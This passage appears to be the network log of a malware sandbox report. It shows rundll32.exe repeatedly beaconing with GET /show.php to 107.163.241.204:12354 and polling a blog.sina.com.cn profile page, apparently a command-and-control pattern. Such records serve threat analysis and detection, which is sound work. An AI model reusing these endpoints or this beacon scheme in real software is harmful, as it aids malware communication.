                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      118 | 192.168.2.9 | 56943 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:27.383249998 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      119 | 192.168.2.9 | 56944 | 202.108.0.52 | 80 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:27.386986017 CET | 118 | OUT | GET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Dec 11, 2024 16:25:28.957947016 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                                      Server: nginx/1.2.8
                                                      Date: Wed, 11 Dec 2024 15:25:28 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 160
                                                      Connection: keep-alive
                                                      Location: https://blog.sina.com.cn/u/5655029807
                                                      Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      120 | 192.168.2.9 | 58262 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:29.517155886 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      121 | 192.168.2.9 | 58391 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:29.637411118 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      122 | 192.168.2.9 | 59886 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:31.284693956 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      123 | 192.168.2.9 | 60100 | 202.108.0.52 | 80 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:31.400567055 CET | 118 | OUT | GET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Dec 11, 2024 16:25:32.985845089 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                                      Server: nginx/1.2.8
                                                      Date: Wed, 11 Dec 2024 15:25:32 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 160
                                                      Connection: keep-alive
                                                      Location: https://blog.sina.com.cn/u/5655029807
                                                      Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      124 | 192.168.2.9 | 60187 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:31.459821939 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      125 | 192.168.2.9 | 62140 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:33.532506943 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      126 | 192.168.2.9 | 62324 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:33.703341961 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      127 | 192.168.2.9 | 63850 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:35.283638954 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      128 | 192.168.2.9 | 63952 | 202.108.0.52 | 80 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:35.399096012 CET | 118 | OUT | GET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Dec 11, 2024 16:25:36.966459036 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                                      Server: nginx/1.2.8
                                                      Date: Wed, 11 Dec 2024 15:25:36 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 160
                                                      Connection: keep-alive
                                                      Location: https://blog.sina.com.cn/u/5655029807
                                                      Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      129 | 192.168.2.9 | 63953 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:35.403767109 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      130 | 192.168.2.9 | 49408 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:37.516697884 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      131 | 192.168.2.9 | 49568 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:37.649025917 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      132 | 192.168.2.9 | 50337 | 202.108.0.52 | 80 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:38.908620119 CET | 118 | OUT | GET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      133 | 192.168.2.9 | 50887 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:39.296591043 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      134 | 192.168.2.9 | 50977 | 202.108.0.52 | 80 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:39.413924932 CET | 118 | OUT | GET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Dec 11, 2024 16:25:40.981899977 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                                      Server: nginx/1.2.8
                                                      Date: Wed, 11 Dec 2024 15:25:40 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 160
                                                      Connection: keep-alive
                                                      Location: https://blog.sina.com.cn/u/5655029807
                                                      Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      135 | 192.168.2.9 | 50978 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:39.413924932 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      136 | 192.168.2.9 | 52262 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:41.544770002 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      137 | 192.168.2.9 | 52324 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:41.657172918 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      138 | 192.168.2.9 | 53380 | 202.108.0.52 | 80 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:43.011276007 CET | 118 | OUT | GET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      139 | 192.168.2.9 | 53384 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:43.600306034 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      140 | 192.168.2.9 | 53421 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:43.693208933 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      141 | 192.168.2.9 | 53422 | 202.108.0.52 | 80 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:43.694067955 CET | 118 | OUT | GET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Dec 11, 2024 16:25:45.261578083 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                                      Server: nginx/1.2.8
                                                      Date: Wed, 11 Dec 2024 15:25:45 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 160
                                                      Connection: keep-alive
                                                      Location: https://blog.sina.com.cn/u/5655029807
                                                      Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      142 | 192.168.2.9 | 55505 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:46.585161924 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      143 | 192.168.2.9 | 55526 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:46.710813999 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      144 | 192.168.2.9 | 55962 | 202.108.0.52 | 80 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:47.209956884 CET | 118 | OUT | GET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      145 | 192.168.2.9 | 56247 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:47.615381956 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      146 | 192.168.2.9 | 56326 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:47.735153913 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      147 | 192.168.2.9 | 56327 | 202.108.0.52 | 80 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:47.735380888 CET | 118 | OUT | GET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Dec 11, 2024 16:25:49.296241045 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                                      Server: nginx/1.2.8
                                                      Date: Wed, 11 Dec 2024 15:25:49 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 160
                                                      Connection: keep-alive
                                                      Location: https://blog.sina.com.cn/u/5655029807
                                                      Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      148 | 192.168.2.9 | 57951 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:49.856829882 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      149 | 192.168.2.9 | 58061 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:49.975644112 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      0 | 192.168.2.9 | 49834 | 202.108.0.52 | 443 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2024-12-11 15:24:01 UTC | 142 | OUT | GET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Connection: Keep-Alive


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      1 | 192.168.2.9 | 49927 | 202.108.0.52 | 443 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2024-12-11 15:24:09 UTC | 142 | OUT | GET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Connection: Keep-Alive


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      2 | 192.168.2.9 | 49975 | 202.108.0.52 | 443 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2024-12-11 15:24:13 UTC | 142 | OUT | GET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Connection: Keep-Alive


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      3 | 192.168.2.9 | 50022 | 202.108.0.52 | 443 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2024-12-11 15:24:17 UTC | 142 | OUT | GET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Connection: Keep-Alive


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      4 | 192.168.2.9 | 50072 | 202.108.0.52 | 443 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2024-12-11 15:24:21 UTC | 142 | OUT | GET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Connection: Keep-Alive


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      5 | 192.168.2.9 | 50122 | 202.108.0.52 | 443 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2024-12-11 15:24:25 UTC | 142 | OUT | GET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Connection: Keep-Alive


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      6 | 192.168.2.9 | 50172 | 202.108.0.52 | 443 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2024-12-11 15:24:29 UTC | 142 | OUT | GET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Connection: Keep-Alive


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      7 | 192.168.2.9 | 50226 | 202.108.0.52 | 443 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2024-12-11 15:24:33 UTC | 142 | OUT | GET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Connection: Keep-Alive


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      8 | 192.168.2.9 | 50283 | 202.108.0.52 | 443 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2024-12-11 15:24:37 UTC | 142 | OUT | GET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Connection: Keep-Alive


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      9 | 192.168.2.9 | 50474 | 202.108.0.52 | 443 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2024-12-11 15:24:49 UTC | 142 | OUT | GET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Connection: Keep-Alive


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      10 | 192.168.2.9 | 50561 | 202.108.0.52 | 443 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2024-12-11 15:24:53 UTC | 142 | OUT | GET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Connection: Keep-Alive


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      11 | 192.168.2.9 | 50660 | 202.108.0.52 | 443 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2024-12-11 15:24:57 UTC | 142 | OUT | GET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Connection: Keep-Alive


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      12 | 192.168.2.9 | 50784 | 202.108.0.52 | 443 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2024-12-11 15:25:02 UTC | 142 | OUT | GET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Connection: Keep-Alive


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      13 | 192.168.2.9 | 50936 | 202.108.0.52 | 443 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2024-12-11 15:25:06 UTC | 142 | OUT | GET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Connection: Keep-Alive


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      14 | 192.168.2.9 | 51144 | 202.108.0.52 | 443 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2024-12-11 15:25:10 UTC | 142 | OUT | GET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Connection: Keep-Alive


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      15 | 192.168.2.9 | 51381 | 202.108.0.52 | 443 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2024-12-11 15:25:14 UTC | 142 | OUT | GET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Connection: Keep-Alive


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      16 | 192.168.2.9 | 51633 | 202.108.0.52 | 443 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2024-12-11 15:25:18 UTC | 142 | OUT | GET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Connection: Keep-Alive


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      17 | 192.168.2.9 | 51858 | 202.108.0.52 | 443 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2024-12-11 15:25:22 UTC | 142 | OUT | GET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Connection: Keep-Alive


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      18 | 192.168.2.9 | 54674 | 202.108.0.52 | 443 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
